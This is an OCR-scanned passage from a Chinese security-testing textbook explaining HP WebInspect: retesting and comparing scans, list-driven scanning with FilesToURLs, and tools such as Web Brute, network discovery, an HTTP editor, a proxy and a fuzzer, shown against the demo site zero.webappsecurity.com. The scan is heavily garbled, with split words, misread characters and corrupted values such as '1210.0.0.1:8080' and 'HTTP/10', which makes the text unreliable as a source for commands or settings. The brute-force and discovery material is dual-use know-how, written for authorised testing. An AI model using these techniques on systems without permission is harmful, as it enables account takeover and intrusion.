http: //zero.webappsecurity.com:8Ü/acctsferdone. asp (Duet | 
http: //zero.webappsecurity.com:8D/banklogin.asp (Query) s | 
hitp://zero.webappsecurity.com: 8Ü/ccrastr.html (Query) acd] 
http: //zero.webappsecurity.com:80/login1.asp (Post) login=| 
E http: //zero.webappsecurity.com:80/ 
E http: //zero.webappsecurity.com:8Ü/images/ 
[3 http: //zero.webappsecurity.com:BÜ/acctrgstr. asp 
[F http://zero.webappsecurity.com:80/acctsum. asp 
A http: //zero.webappsecurity.com:BÜ/acctsum.asp 
['] http://zero.webappsecurity.com:BÜ/acctsfer.asp 
[1 http: //zero.webappsecurity.com:8Ü/banklogin.asp 
['] http://zero.webappsecurity.com:BD/billpays. html 
['] http://zero.webappsecurity.com:BÜ/statmnt html 
Jl | 


TESTSTISTISTIS] [S 


JAAK 


& 


& 


图 10-69 ”使 用 步 模式 网 站 


1. 重新 测试 个 别 的 漏洞 


重新 测试 功能 是 一 个 非常 强大 的 工具 ， 它 确认 开发 商 已 经 固定 一 个 特定 漏洞 ， 而 不 必 进 
行 一 个 全 新 的 扫描 。 
1) 打开 扫描 。 


2) 在 导航 窗 格 右键 单 击 一 个 漏洞 会 话 ， 或 在 摘要 窗 格 中 的 Vulnerability( 漏 洞 ) 选 项 卡 上 
右键 单 击 一 个 漏洞 。 

3) 从 快捷 菜单 中 选择 Review Vulnerability( 审 阅 漏洞 )。 

4) 在 漏洞 审阅 窗口 中 ， 单 击 Retest( 重 新 测试 )。 

WeblInspect 可 将 所 有 漏洞 路 径 重新 提交 到 服务 器 ， 并 对 原始 响应 (重新 提交 前 ) 的 每 个 结 
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果 进 行 比较 ， 并 显示 相 匹配 的 原始 重新 测试 响应 的 百分比 。 这 表明 路 径 漏洞 是 否 被 准确 地 再 
现 。 每 个 HTTP 请 求 和 响应 的 原始 会 话 和 重新 测试 会 话 可 并 列 比较 ， 立 刻 显露 任何 显著 的 变 
化 。 一 旦 该 项 目 已 被 确认 为 一 个 漏洞 ， 用 户 可 将 这 个 缺陷 提交 到 HP 质量 中 心 (ALM) 或 IBM 
Rational ClearQuest。 

2. 重新 测试 所 有 发 现 的 漏洞 


在 这 种 类 型 的 扫描 检查 中 ， 原 始 扫描 中 只 会 发 现 部 分 目标 网 站 的 漏洞 。WebInspect 不 进 
行 新 网 站 的 候 行 ， 而 只 是 追溯 漏洞 会 话 (记录 在 原始 扫描 ) 和 攻击 资源 ， 并 使 用 先前 所 采用 的 
相同 方式 。 
使 用 在 摘要 窗 格 中 的 Vulnerability( 漏 洞 ) 选 项 卡 以 查看 结果 。 该 选项 卡 包含 一 个 名 为 
Reproduced( 再 现 ) 的 额外 列 ， 其 中 可 能 包含 以 下 值 : 
。 未 发 现 /固定 (Not Found/Fixed): 在 原始 扫描 检测 到 的 漏洞 ， 通 过 重新 测试 未 找到 。 
这 些 漏洞 会 显示 灰色 文本 。 用 户 可 以 对 这 些 项 目的 漏洞 进行 审阅 和 重新 测试 。 括 号 
中 的 百分比 表示 对 这 个 判定 的 一 个 启发 式 的 置信 水 平 。 
。 再 现 (Reproduced): 原始 扫描 和 重新 测试 检测 到 相同 的 漏洞 ， 即 该 漏洞 仍然 存在 。 
。 新 建 (New): 重新 测试 检测 到 ， 但 不 是 原始 扫描 报告 中 的 漏洞 。 
重新 测试 所 有 漏洞 : 
1) 执行 下 列 操作 之 一 : 
。 打开 扫描 。 
。 选择 管理 扫描 页 面 上 的 扫描 。 
2) 单 击 Rescan( 重 新 扫描 )， 并 选择 Verify Vulnerabilities( 验 证 漏洞 )。 
3. 重新 扫描 网 站 


重新 扫描 功能 可 以 轻松 地 从 一 个 打开 的 (或 选 定 的 ) 扫 描 转换 到 原始 扫描 预 装 设置 的 扫描 
向 导 。 用 户 可 能 希望 更 新 网 站 (和 原始 扫描 使 用 相同 的 设置 )， 以 确定 先前 是 否 发 现 的 漏洞 已 
经 被 修复 和 一 个 新 的 漏洞 是 否 被 发 现 。 或 者 ， 可 能 想 调 整 一 些 设置 来 改善 怜 行 或 审计 。 

1) 执行 下 列 操作 之 一 : 

。 打开 扫描 ， 单 击 工具 栏 的 Rescan( 重 新 扫描 ) 按 钮 ， 然 后 选择 Scan Again( 再 次 扫描 )。 

* 在 WebInspect 开始 页 面 ， 单 击 Manage Scans( 管 理 扫描 )， 然 后 选择 一 个 扫描 和 单 击 

Rescan( 重 新 扫描 )。 

2) 使 用 扫描 向 导 ， 可 选择 修改 用 于 原始 扫描 的 设置 。 

注意 : 扫描 名 称 的 默认 设置 为 <original scan name>-1。 如 果 进 行 重 新 扫描 ， 追 加 到 默认 
名 称 ， 整 数 部 分 的 值 递增 。 

3) 在 扫描 向 导 的 最 后 一 步 ， 单 击 Scan( 扫 描 )。 

4. 比较 扫描 


可 通过 比较 同一 目标 的 两 个 不 同 扫描 来 发 现 漏洞 ， 并 使 用 这 些 信息 ， 如 图 10-70 所 示 。 
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Vulnerability Compare 


图 10-70 ”比较 扫描 结果 图 


。 验证 补丁 :漏洞 被 确定 时 ， 比 较 初始 扫描 检测 到 的 漏洞 和 后 续 网 站 扫描 到 的 漏洞 。 

。 检查 扫描 健康 更改 扫描 设置 ， 这 些 变 化 扩大 了 攻击 面 的 验证 。 

。 发 现 新 漏洞 :确定 是 否 有 新 的 漏洞 已 经 在 网 站 的 更 新 版 本 中 推出 。 

。 调查 问题 ， 追求 异常 现象 ， 如 误 报 或 遗漏 的 漏洞 。 

。 比较 授权 访问 :使 用 两 个 不 同 的 用 户 账户 来 发 现 漏洞 的 执行 扫描 ， 该 漏洞 对 于 两 个 

账户 是 独 有 的 或 共有 的 。 

注意 : 两 个 扫描 数据 必须 存储 在 同一 个 数据 库 类 型 (SQL Server Express 与 SQL Server 
Standard/Enterprise). 

请 执行 下 列 操作 之 一 来 比较 两 次 扫描 : 

。 从 管理 扫描 页 面 ， 选 择 两 个 扫描 和 单 击 比较 。 

。 从 含有 打开 扫描 选项 卡 中 ， 单 击 Compare( 比 较 ); 然后 从 扫描 比较 对 话 框 的 列表 中 选 

择 扫 描 和 单 击 比较 。 

如 果 选 择 扫描 有 不 同 的 起 始 网 址 ， 或 者 如 果 使 用 不 同 的 扫描 策略 ， 或 者 执行 的 扫描 是 不 
同 的 类 型 (如 一 个 基础 扫描 与 一 个 Web 服务 扫描 )， 应 用 程序 将 出 现 一 条 警告 消息 ， 可 以 选择 
继续 ， 也 可 以 终止 功能 。 

仪表 板 

对 于 扫描 A 和 扫描 B，Vulnerability Compare( 漏 洞 比较 ) 选 项 卡 的 仪表 板 显示 以 下 信息 : 

。 扫描 AB: 扫描 的 名 称 。 

。 起 始 URL: 目标 网 站 的 网 址 。 

。 日 期 : 执行 原始 扫描 的 日 期 和 时间。 

。 策略 : 用 于 扫描 策略 。 

e 问题 检测 到 的 漏洞 和 误 报 的 数量 。 

e 独 有 /会 话 总 数 ， 此 扫描 创建 了 独 有 的 会 话 数 量 ， 相 比 于 会 话 总 数 。 

。 会 话 有 覆盖 : 常见 两 种 扫描 的 会 话 百分比 。 

仪表 板 描绘 两 个 集合 的 维 恩 图 (也 叫 文 氏 图 ): 通过 扫描 A( 黄 色 圆 圈 表 示 ) 的 漏洞 发 现 和 扫 
Hi B( 蓝 色 圆 圈 表 示 ) 的 漏洞 发 现 。 两 个 集合 的 交集 是 由 绿色 的 重 赤 表示。 该 图 进行 缩放 ， 以 
反映 两 个 集合 之 间 的 实际 关系 ， 如 图 10-71 所 示 。 


*394* 软件 安全 测试 及 工具 应 用 (第 2 版 ) 


仪表 板 还 显示 独 有 的 漏洞 数量 ， 按 严重 程度 ， 由 每 个 单独 扫描 和 那些 由 两 个 扫描 (交集 ) 
检测 发 现 ， 用 柱状 图 表示 这 些 结果 ， 如 图 10-72 所 示 。 


图 10-71 两 个 集合 的 维 恩 图 


Click number to populate Summary pane 
with these items. 


图 10-72. A 中 唯一 漏洞 的 数量 


漏洞 比较 

在 摘要 窗 格 中 显示 一 个 或 两 个 扫描 检测 到 的 漏洞 列表 ， 从 漏洞 中 选择 一 个 过 滤器 比较 面 
板 。 选 项 包括 : 

A fl B 的 并 集 。 

A 独 有 的 。 

B 独 有 的 。 

A fll B 的 交集 。 

也 可 以 单 击 维 恩 图 的 相应 部 分 显示 A 独 有 的 和 /或 B 独 有 的 所 发 现 漏洞 。 

注意 ， 当 比较 扫描 时 ，WebInspect 忽略 主机 和 端口 。 考 虑 到 运行 在 不 同 服务 器 的 两 个 重 
复 的 网 站 。 一 个 正在 开发 的 网 站 可 能 在 http://devmysite.com 运 行 ， 而 同一 个 网 站 可 能 会 在 
http://QA.mysite.com 来 进行 测试 。 当 比较 两 个 扫描 之 间 的 会 话 和 漏洞 时 ， 不 考虑 主机 的 URL. 
和 端口 。 

例如 : 

HH A: 会 话 1 是 一 个 http 到 url http:/qa mysite.com/stufppage/info asp 的 请 求 。 它 有 一 个 

扫描 B: 会 话 1 是 一 个 http 到 url http:/devmysite com:8080/stufppage/info.asp 的 请 求 。 它 
和 扫描 A 中 的 会 话 1 具有 相同 的 漏洞 。 

当 比 较 扫描 时 ， 会 话 1 会 显示 为 “A 和 B 相交 ”。 


从 严重 性 面板 根据 严重 性 选择 一 个 或 多 个 选项 来 进一步 过 滤 漏洞 列表 。 选 择 是 取 并 集 。 
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注意 : 也 可 以 分 组 和 过 滤 结 果 。 
默认 情况 下 ， 网 格 显示 以 下 栏目 : 路 径 、 方 法 、 漏 洞 号 参数 和 扫描 名 称 。 要 添加 或 删除 
列 ， 请 右键 单 击 列 标题 栏 并 选择 Columns( 列 )。 可 用 列 如 下 : 


严重 性 (Severity): 该 漏洞 的 相对 评价 ， 从 低 到 关键 。 请 参阅 下 面 的 相关 图 标 ， 如 图 
10-73 所 示 。 

检查 (Check): WebInspect 探测 特定 的 漏洞 ， 如 跨 网 站 脚本 、 未 加 密 的 登录 表单 等 。 

路 径 (Path): 指向 资源 的 完整 路 径 。 

方法 (Method): HTTP 方法 ， 如 GET. POST 等 。 

堆栈 (Stack): 从 SecurityScope 获得 堆栈 跟踪 信息 。 此 列 当 且 仅 当 扫描 SecurityScope 
被 安装 在 目标 服务 器 上 时 可 用 。 

漏洞 号 参数 (Vuln Param): 有 漏洞 的 参数 名 称 。 

参数 (Parameters): 分 配 的 参数 和 值 名 称 。 

手动 (Manual): 如 果 该 漏洞 被 手动 创建 ， 显 示 一 个 复 选 标记 。 

重复 (Duplicates):; 通过 SecurityScope 检测 到 的 漏洞 可 以 追溯 到 同一 个 源头 。 

位 置 (Location): 路 径 加 上 参数 。 

CWE ID(CWE ID): 与 漏洞 相关 的 共同 弱点 枚 举 标识 符 。 

扫描 名 称 (Scan Name): 扫描 A 和 /或 扫描 B. 


漏洞 的 严重 性 由 图 10-73 中 所 示 的 图 标 表 示 。 


Critical | ^ High Medium | Low 
ü | e o | © 


图 10-73 ”漏洞 严重 性 图 标 


随 着 会 话 被 选中 ， 也 可 以 通过 从 会 话 信息 面板 中 选择 一 个 选项 ， 查 看 相关 信息 。 
对 于 发 送 和 查询 参数 ， 单 击 参 数列 中 的 条 目 显示 参数 的 一 个 可 读 性 概要 。 


FilesToURLs 工具 

作为 正常 安装 过 程 的 一 部 分 ，WebInspect 安装 两 个 命令 行 实用 程序 (FilesToURLs.exe 和 
FilesToURLspy)， 虽 在 发 现 和 评估 所 有 网 站 资源 。 当 在 服务 器 上 执行 时 ， 该 实用 程序 会 检查 
目标 网 站 上 的 所 有 文件 , 并 创建 包含 每 个 检测 的 URL 的 XML 文件 。 然后 , 配置 基础 扫描 时 ， 
可 选择 列表 驱动 的 扫描 方法 ， 并 提交 该 XML 文件 。 表 10-11 列 出 FilesTOURLs.exe 的 用 法 。 
表 10-12 列 出 FilesTOURLs.py 的 用 法 。 

注意 : FilesToURLs.exe 需要 NET Framework 4.0 或 更 高 版 本 。FilesToURLs.py 需要 
Python 2.6. 

要 创建 XML 文件 并 将 其 包含 在 一 个 扫描 中 : 

1) 找到 FilesToURLs.exe( 在 UNIX 系统 中 , 找到 FilesToURLspy)。 默 认 位 置 是 C:\Program 
Files\HP\HP WebInspect。 

2) 使 用 网 络 共享 (或 将 文件 复制 到 用 户 的 Web 服务 器 后 ), 运行 该 实用 工具 , 根据 下 面 的 
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描述 使 用 。 
3) 启动 WebInspect。 
4) 在 扫描 向 导 的 第 一 步 ， 


选择 List-Driven Scan( 列 表 驱 动 的 扫描 )。 


5) 单 击 浏览 按钮 ， 选 择 


FilesToURLs 实用 程序 生成 的 XML 文件 。 


6) 完成 向 导 并 开始 扫描 。 


表 10-11 使 用 FilesToURLs.exe 


5 Hu 说 — 明 
/docroot Web 文件 存储 在 本 地 路 径 (必需 ) 
/outfile 要 创建 的 XML 文件 的 名 称 (必需 ) 
/include 现 有 的 文件 ， 其 内 容 应 包含 在 输出 中 
/hostname 文件 服务 (默认 值 : 本 地 主机 名 ) 的 主机 名 
/baseurl 文件 服务 的 基础 URL( 默 认 是 : /) 
/port 该 Web 服务 器 正在 侦 昕 的 端口 (默认 :80 或 443) 
/secure 指示 该 端口 正在 使 用 SSL 

表 10-12 使 用 FilesTOURLs.py 

选项 Wi — 明 
-h, -help 显示 帮助 消息 并 退出 
-d DOCROOT, --docroot-DOCROOT Apache 的 文档 根 目 录 或 文件 服务 的 其 他 目录 
-0 FILE, —-outfile-FILE 输出 到 文件 (默认 为 STDOUT) 


-i FILE, --include=FILE 


在 输出 中 包含 文件 的 内 容 


-n HOSTNAME, --hostname-HOSTNAME | Web 服务 器 的 主机 名 (默认 为 本 地 主机 名 ) 


-b BASEURL, --baseurl-BASEURL 
-p PORT, --port-PORT 


-S. —Secure 


来 自 服务 文件 (默认 为 ) 的 基本 URL 
服务 正在 侦 听 的 端口 (默认 为 80 或 443) 
使 用 SSL 指定 监听 端口 (默认 为 false) 


该 列表 驱动 扫描 选项 也 可 以 使 用 手动 创建 的 纯 文本 文件 ， 而 不 是 由 FilesToURLs 实用 程 
序 生成 的 XML 文件 。 每 行列 出 一 个 URL。 每 个 URL 必须 完全 合法 ， 并 且 必须 包括 协议 ( 例 


如 ，http:// 或 https://)。 
* IPv6 
*  WebInspect(/A 8.1 版 


始 ) 支 持 Internet 协议 版 本 6(Pv6) 地 址 的 网 站 和 网 络 服务 扫描 。 


当 指 定 起 始 URL， 则 必须 将 IPv6 地 址 写 在 括号 内 。 例 如 : 
。 错误 ! 超 链接 引用 无 效 。 
e  WeblInspect 扫描 “localhost”。 
© WebInspect 扫描 主机 开始 于 “ 子 文件 夹 ”目录 的 指定 地 址 。 
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10.4 WebInspect 工具 简介 


一 套 强大 的 诊断 和 渗透 测试 工具 集成 在 WebInspect 中 。 包 括 : 
。 审计 输入 编辑 器 

* Cookie Cruncher 

。 编码 器 /解码 器 

* HTTP 编辑 器 

e 日 志 查 看 器 

e 策略 管理 器 

。 正则 表达 式 编辑 器 
。 报表 设计 器 

* Server 分 析 

* Server 事件 探查 器 
。 智能 更 新 

。 SQL 注 入 

。 SWF 扫描 

e Web Brute 

。 网 络 发 现 

* Web 窗 体 编辑 器 

* 网络 Fuzzer 

。 网络 宏 录制 

。 Web 代理 

* Web 服务 测试 设计 
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WeblInspect 安装 也 包括 HP 支持 工具 , 它 提供 了 一 种 简捷 的 方法 来 上 传 文件 , 可 帮助 HP 
技术 支持 人 员 分 析 和 解决 用 户 在 使 用 应 用 程序 安全 中 心 产品 时 过 到 的 任何 问题 。 
当 使 用 集成 代理 工具 时 ， 即 使 证 书 是 必需 的 ， 用 户 也 可 能 会 遇 到 服务 器 不 需要 客户 端 证 


书 的 情况 。 在 需要 证 书 时 ， 必 须 编 辑 SPLNet.Proxy.Config 文件 。 
步骤 如 下 : 
1) 打开 Microsoft Internet Explorer. 
2) 单 击 Tools( 工 具 )， 再 单 击 Intemet Options(Internet 选项 )。 


3) 在 Internet 选项 窗口 中 ， 选 择 Content( 内 容 ) 选 项 卡 ， 然 后 单 击 Certificates( 证 书 )。 


4) 在 证 书 窗 


中 ， 选 择 一 个 证 书 ， 然 后 单 和 


E View( 查 看 )。 


5) 在 证 书 窗口 中 ， 单 击 Details( 讨 


6) 单 击 Serial Number( 序 列 号 字段 ) 和 复制 出 现在 下 部 窗 格 中 的 序列 号 ( 突 日 


按 Ctrl + C 键 )。 
7) 关闭 所 有 窗口 。 


# 细 信息 ) 选 项 卡 。 


8) 打开 要 编辑 的 SPLNetProxyConfig 文件 。 默 认 位 置 是 C:\Program Files\HP\HP 
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WebInspect( 或 用 户 自 定义 安装 位 置 )。 
9) 在 客户 端 证 书 覆 盖 部 分 ， 添 加 以 下 条 目 : 


«ClientCertificateOverride HostRegex-"RegularExpression" 
CertificateSerialNumber-"Number"/» 


HF, RegularExpression 是 一 个 匹配 主机 URL 的 正则 表达 式 (例如 : austin hp.com)» 
10) 保存 编辑 的 文件 。 


10.4.1 策略 管理 器 


当 使 用 WebInspect 审计 或 疏 行 Web 应 用 程序 时 ， 策 略 是 审计 引擎 和 攻击 代理 的 集合 。 
每 个 部 件 都 有 一 个 特定 的 任务 ， 比 如 测试 易 感 性 跨 网 站 脚本 ， 网 站 建设 树 ， 探 测 已 知 的 服务 
器 漏洞 等 ， 这 些 组 件 被 分 为 以 下 几 组 : 

1) 审计 引擎 

2) 一 般 应 用 测试 

3) 通用 文本 搜索 

4) 第 三 方 Web 应 用 程序 

5) Web 框架 /语言 

6) Web 服务 器 

7) 网 站 发 现 

8) 自 定 义 检查 

所 有 这 些 组 件 (除了 审计 引擎 ) 统 称 为 攻击 群 。 每 个 攻击 组 所 包含 的 单个 模块 ( 称 为 攻击 
理 ) 的 子 组 检查 用 户 网 站 的 漏洞 。 

WebInspect 包含 的 几 个 预 包装 策 略 旨 在 满足 大 多 数 用 户 的 需要 。 所 有 的 策略 包含 所 有 可 
能 的 审计 引擎 和 代理 ， 但 每 个 策略 都 有 这 些 组 件 可 使 用 的 不 同 子 集 。 用 户 可 通过 启用 或 禁用 
审计 引擎 和 /或 个 人 攻击 代理 (或 代理 组 ) 来 编辑 策略 。 用 户 可 编辑 现 有 策略 ， 也 可 用 新 名 称 保 
存 并 创建 一 个 策略 。 


10.4.2 ”审计 输入 编辑 器 


有 两 种 方法 来 访问 审计 输入 编辑 器 : 

。 从 策略 管理 器 (使 用 策略 管理 器 Tools( 工 具 ) 菜 单 )。 使 用 此 方法 来 创建 或 修改 一 个 输入 
文件 (<filename>.inputs)。 然后 ,用户 可 以 修改 扫描 设置 来 指定 该 文件 。 要 修改 输入 文 
件 ， 单 击 审计 输入 编辑 工具 栏 的 打开 图 标 或 选择 File( 文 件 )， 然 后 选择 Open( 打 开 )。 

。 从 默认 或 当前 设置 (在 攻击 排除 设置 中 单 击 审计 输入 编辑 器 按钮 )。 使 用 这 种 方法 ， 用 
户 可 以 直接 修改 默认 设置 ， 但 不 能 创建 一 个 单独 的 输入 文件 。 

但 是 ， 如 果 从 策略 管理 器 访问 审计 输入 编辑 器 ， 必须 导入 WebInspect 包含 检查 输入 修改 

的 保存 文件 。 要 做 到 这 一 点 : 
1) 在 WebInspect 菜单 栏 中 ， 单 击 Edit( 编 辑 )， 然 后 单 击 Default Settings( 默 认 设置 )。 
2) 选择 Attack Exclusions( 攻 击 排除 )。 


i 
= 


X 
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3) 单 击 Import Audit Inputs( 导 入 审计 输入 )。 

4) 选择 用 户 所 创建 的 文件 ， 然 后 单 击 Open( 打 开 )。 

当 通 过 当前 设置 或 默认 设置 窗口 访问 时 ，Attack Exclusions 面板 、 审 计 输 入 编辑 器 不 包 
含 菜单 栏 或 工具 栏 。 


10.4.3 Web 窗 体 编辑 器 


大 多 数 Web 应 用 程序 都 包含 输入 控件 (文本 框 、 按 钮 、 下 拉 列 表 等 ) 组 成 的 形式 。 提 交 表 
单 给 代理 处 理 之 前 ， 用 户 一 般 通过 修改 控制 (如 输入 文本 或 检查 框 )“ 完 成 ”表单 。 通 常 ， 这 
种 处 理会 导致 用 户 导航 到 另 一 页 面 或 应 用 程序 的 一 部 分 。 例 如 ， 完 成 一 个 登录 表单 后 ， 用 户 
将 进入 到 应 用 程序 的 开始 页 面 。 

有 些 网 站 (如 WebInspect 银 行 应 用 示例 zero.webappsecurity com) 包 含 许多 不 同 的 表单 来 完 
成 各 种 交易 。 如 果 WebInspect 是 导航 应 用 程序 中 所 有 可 能 存在 的 联系 ， 它 必须 能 够 为 每 个 表 
单 提交 适当 的 数据 。 

用 户 可 以 指定 一 个 表单 输入 为 “全 局 ” 这 意味 着 它 的 值 将 被 提交 给 具有 同名 属性 的 任 
何 输入 控制 ， 无 论 该 URL 发 生 在 哪里 。 

在 扫描 过 程 中 ， 如 果 WebImspect 发 现 一 个 输入 控件 的 名 称 属性 和 用 户 创建 的 文件 不 匹 
配 ， 将 提交 一 个 默认 值 (12345)。 

注意 : 如 果 用 户 使 用 的 是 代理 服务 器 ，Web 窗 体 编辑 器 将 不 会 使 用 默认 设置 。 必 须 首 先 
配置 Internet Explorer 以 便 使 用 所 需 的 代理 。 

有 两 种 方法 来 创建 表单 值 的 列表 : 手动 创建 列表 和 通过 应 用 程序 浏览 记录 值 。 


10.4.4 Web Brute 


此 工具 将 确定 用 户 名 和 密码 是 否 很 容易 猜 到 。 例 如 ， 如 果 一 个 客户 访问 网 站 时 ， 使 用 
customer 用 户 名 和 password 密码 ， 你 可 能 会 想 告诫 该 用 户 他 的 密码 和 用 户 名 的 脆弱 性 ， 并 建 
议 他 改变 密码 和 /或 用 户 名 。 

Web Brute( 网 络 狂人 ) 将 尝试 登录 表单 或 认证 页 面 的 “Brute Force” 攻 击 ， 使 用 用 户 名 和 
密码 两 个 准备 清单 。 

注意 : 这 是 一 种 侵入 式 攻击 ， 并 浆 入 到 安全 区 域 。Brute Force 攻击 仅 用 于 测试 ， 而 不 应 
被 用 于 对 抗 不 知情 的 网 站 。 


10.4.5 ”网 络 发 现 


使 用 网 络 发 现在 企业 环境 中 找到 所 有 打开 的 主机 ， 如 图 10-74 所 示 。 

网 络 发 现 将 数据 包 发 送 到 所 有 开放 的 端口 (一 定 范围 内 的 下 地 址 和 指定 的 端口 )， 搜 索 特 
定 信息 服务 器 的 响应 ， 然 后 显示 结果 。 有 包含 网 络 发 现 的 两 个 预定 义 数据 包 : Web 服务 器 和 
SSL Web 服务 器 。 它 们 都 包含 GET / HTTP/10 ff] HTTP 请 求 : 网 络 发 现 用 字符 串 “HTTP” 
搜索 HTTP 响应 ;如 果 找 到 该 字符 串 ， 它 显示 IP 地 址 、 端 口号 以 及 文本 “WebServer, ”后 跟 
一 个 旨 在 显示 服务 器 的 名 称 和 版 本 号 的 正则 表达 式 搜索 结果 。 
用 户 可 在 文本 文件 中 保存 搜索 的 服务 器 列表 。 
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1PV4IPV6 Addresses (or ranges) 
172.16.10.0-172.16.10.29 


Example: 192.168.0.1-192.168.0.12:172.16.10.20; 2001:0db8::1428:57ab 
Total IP addresses specified: 30 


Discovered End Points 
Selection IP Address Port 


E 10-74 ”使 用 网 络 发 现在 企业 环境 中 找到 所 有 打开 的 主机 


10.4.6 ”编码 器 /解码 器 


该 工具 允许 使 用 Base64、 十 六 进 制 、MD5 和 其 他 方案 来 编码 和 解码 值 ， 也 可 以 将 一 个 
字符 串 转换 为 Unicode 字符 串 ， 并 在 URL 中 使 用 特殊 字符 。 在 扫描 结果 进行 分 析 期 间 ， 当 遇 
到 怀疑 之 处 时 ， 编 码 或 加 密 格式 的 字符 串 可 以 进行 复制 ， 将 其 粘贴 到 编码 器 /解码 器 工具 ， 然 
后 单 击 解码 ， 如 图 10-75 所 示 。 


** Encoders/Decoders 
i Help 
Encoding Character Set 


1234567290 Select By 
O Character Set Name © Display Name 


Westem European (Windows) 


Westem European (Windows) 
Character Set "Windows-1252" 
Code Page 1252 


Hex Display 


31 32 33 34 35 3€ 37 38 39 30 


图 10-75 编码 器 /解码 器 工具 
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10.4.7 ”正则 表达 式 编辑 器 


正则 表达 式 是 描述 一 组 字符 串 的 模式 。 正 则 表达 式 通 过 使 用 各 种 运算 符 来 组 合 更 小 的 表 
达 式 构造 ,类 似 于 数学 表达 式 。 只 有 高 级 用 户 才能 用 正则 表达 式 的 知识 使 用 此 功能 , 如 图 10-76 
所 示 。 


图 10-76 ”正则 表达 式 编辑 器 


10.4.8 HTTP 编辑 器 


使 用 HTTP 编辑 器 来 创建 或 编辑 请 求 ， 将 其 发 送 到 服务 器 ， 并 查看 在 原始 的 HTML 或 
在 浏览 器 中 呈现 的 响应 。 
HTTP 编辑 器 是 手动 黑客 工具 ， 如 图 10-77 所 示 。 
| vj TED @ Show History 


File Edit View Help 
Location: httpy//ocalhost80/ 


k No occurrences found in request 


图 10-77 HTIP 编辑 器 
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10.4.9 Web 代理 


Web 代理 是 一 个 独立 的 代理 服务 器 ， 可 在 桌面 上 配置 和 运行 。 

有 了 它 ， 可 以 从 WebInspect、 浏 览 器 或 其 他 工具 监控 流量 。 它 是 用 于 调试 和 渗透 扫描 的 
TH; 当 浏 览 一 个 网 站 时 ， 用 户 可 以 看 到 每 个 请 求 和 服务 器 响应 。 

用 户 还 可 以 创建 启动 宏 或 使 用 登录 宏 。 

使 用 Web 代理 服务 器 与 浏览 器 之 前 ， 必 须 配 置 浏览 器 的 代理 设置 。 如 果 使 用 Intemet 
Explorer: 

1) 单 击 Tools( 工 具 )， 再 单 击 Intemet Options(Intemet 选项 )。 

2) 单 击 Connections( 连 接 ) 选 项 卡 。 

3) 单 击 LAN Settings(LAN 设置 )。 

4) 在 LAN( 局 域 网 ) 设 置 窗口 中 , 选择 Use a Proxy Server for your LAN( 为 局 域 网 使 用 代理 
服务 器 )， 并 输入 代理 服务 器 要 使 用 的 地 址 和 端口 。 默 认 情况 下 ，Web 代理 服务 器 使 用 本 地 主 
机 设置 (1210.0.0.1:8080)。 

用 户 还 应 该 在 Microsoft Intemet Explorer 中 通过 代理 连接 使 用 HTTP1.1。 在 Intemet 
Explorer: 

1) 单 击 Tools( 工 具 )， 再 单 击 Intemet Options(Intemet 选项 )。 

2) 单 击 Advanced( 高 级 ) 选 项 卡 。 

3) 在 HITP 1.1 设置 部 分 ,选择 Use HTTP 1.1 through proxy connections( 通 过 代理 连接 使 
H HTTP 1.1). 


10.4.10 ”智能 升级 


使 用 智能 更 新 下 载 最 新 的 方案 以 及 漏洞 和 策略 信息 。 智 能 升级 也 保证 了 使 用 WebInspect 
的 最 新 版 本 ， 如 果 该 产品 的 新 版 本 可 供 下 载 也 会 提示 。 通 过 智能 更 新 下 载 的 新 漏洞 检查 不 会 
自动 添加 到 创建 的 任何 自 定义 策略 。 

注意 ， 对 于 AMP 安装 ， 如 果 使 用 WebInspect 智能 更 新 更 改 或 替换 某 个 AMP 的 相关 文 
件 ， 检 测 部 件 服务 可 能 会 停止 ， 检 测 部 件 会 显示 状态 为 “ 脱 机 ”。 必 须 启动 WebInspect 应 用 
程序 并 重新 启动 服务 。 要 做 到 这 一 点 ， 从 AMP 的 菜单 中 选择 配置 ， 然 后 单 击 AMP 配置 窗口 
的 Sensor Service( 检 测 部 件 服务 ) 选 项 卡 上 的 Start( 开 始 ) 按 钮 。 

D 从 工具 栏 中 ， 单 击 Smart Update( 智 能 更 新 ) 或 从 Tools( 工 具 ) 菜 单 中 选择 Smart 
Update( 智 能 更 新 )， 或 从 WebInspect 开始 页 选择 启动 Smart Update( 智 能 更 新 )。 

2) 有 可 用 更 新 时 ， 智 能 更 新 窗口 显示 多 达 三 个 独立 的 可 折 针 面板 来 下 载 以 下 内 容 : 

。 新 的 更 新 

。 WebInspect 软件 

。 智能 更 新 软件 

选择 一 个 或 多 个 下 载 选项 的 关联 复 选 框 。 

3) 确定 要 安装 的 更 新 ， 单 击 Download( 下 载 )。 

如 果 还 没有 可 用 的 WebInspect 新 版 本 ， 惠 普 将 继续 提供 更 新 的 知识 库 ， 但 只 有 10 天 期 
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限 。 超 过 这 个 时 间 ， 直 到 你 下 载 新 的 WebInspect 软件 ， 更 新 才 可 用 。 
10.4.11 Cookie Cruncher 


Cookie Cruncher 分 析 Cookie 相对 容易 确定 。 

网 页 的 超 文本 传输 协议 (HTTP) 是 无 状态 的 ， 这 意味 着 每 个 通信 是 离散 的 ， 不 涉及 发 生 的 
先后 顺序 。 因 为 没有 连续 性 固有 的 协议 ， 应 用 程序 设计 人 员 推 出 了 “会 话 ” 概 念 。 当 用 户 登 
录 到 应 用 程序 中 ， 会 在 服务 器 上 创建 会 话 ， 以 维护 来 自 同一 个 用 户 的 该 状态 的 其 他 请 求 。 

每 个 会 话 都 有 一 个 唯一 的 标识 符 (会 话 卫 )。 这 个 文本 字符 串 在 客户 端 和 服务 器 之 间 传 输 ， 
并 且 可 以 存储 在 Cookie、URL 或 网 页 的 隐藏 字段 。 与 会 话 ID 相关 的 一 个 问题 是 ， 许 多 网 站 
使 用 的 时 间或 中 地 址 算法 具有 可 预测 性 。 这 种 可 预测 性 使 得 网 站 容易 受到 会 话 劫持 。 


10.4.12 网络 Fuzzer 


Fuzzer( 模 糊 测试 ) 是 生成 和 提交 随机 或 连续 的 数据 到 应 用 的 各 个 领域 中 , 试图 发 现 安全 漏 
洞 的 自动 化 软件 测试 技术 。 例 如 ， 搜 索 缓冲 区 溢出 的 时 候 ， 测 试 者 可 以 简单 地 生成 各 种 大 小 
的 数据 并 将 其 发 送 到 应 用 程序 入 口 点 之 一 ， 观 察 应 用 程序 如 何 处 理 它 。 

网 络 Fuzzer 可 运行 Web 应 用 程序 安全 漏洞 的 常见 几 类 自动 化 测试 ， 包 括 SQL 注入 、 格 
式 字符 串 、 跨 网 站 脚本 、 路 径 遍 历 、 缓 冲 区 溢出 以 及 协议 的 实施 问题 。 


10.4.13. SQL 注入 


